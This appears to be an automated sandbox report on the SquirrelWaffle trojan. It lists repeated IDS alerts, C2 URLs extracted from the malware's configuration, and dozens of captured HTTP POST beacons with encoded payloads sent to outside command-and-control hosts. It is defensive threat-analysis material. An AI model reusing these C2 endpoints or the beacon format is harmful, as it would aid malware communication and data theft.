                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: acdlimited.com/2u6aW9Pfe
                  Source: Malware configuration extractorURLs: jornaldasoficinas.com/ZF8GKIGVDupL
                  Source: Malware configuration extractorURLs: orldofjain.com/lMsTA7tSYpe
                  Source: Malware configuration extractorURLs: altayaralsudani.net/SSUsPgb7PHgC
                  Source: Malware configuration extractorURLs: hoteloaktree.com/QthLWsZsVgb
                  Source: Malware configuration extractorURLs: aterwellnessinc.com/U7D0sswwp
                  Source: Malware configuration extractorURLs: sirifinco.com/Urbhq9wO50j
                  Source: Malware configuration extractorURLs: ordpress17.com/5WG6Z62sKWo
                  Source: Malware configuration extractorURLs: mohsinkhanfoundation.com/pcQLeLMbur
                  Source: Malware configuration extractorURLs: lendbiz.vn/xj3BhHtMbf
                  Source: Malware configuration extractorURLs: geosever.rs/ObHP1CHt
                  Source: Malware configuration extractorURLs: nuevainfotech.com/xCNyTjzkoe
                  Source: Malware configuration extractorURLs: dadabhoy.pk/m6rQE94U
                  Source: Malware configuration extractorURLs: 111
                  Source: Malware configuration extractorURLs: sjgrand.lk/zvMYuQqEZj
                  Source: Malware configuration extractorURLs: erogholding.com/GFM1QcCFk
                  Source: Malware configuration extractorURLs: armordetailing.rs/lgfrZb4Re6WO
                  Source: Malware configuration extractorURLs: lefrenchwineclub.com/eRUGdDox
                  Source: Malware configuration extractorURLs: http://23.82.140.206/jquery-3.3.1.slim.min.js
                  Source: Malware configuration extractorURLs: tuxsecuritybiness.com
                  Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                  Source: Joe Sandbox ViewASN Name: HOSTPRO-ASUA HOSTPRO-ASUA
                  Source: global trafficHTTP traffic detected: POST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1Host: hoteloaktree.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA== HTTP/1.1Host: sirifinco.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA== HTTP/1.1Host: sirifinco.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
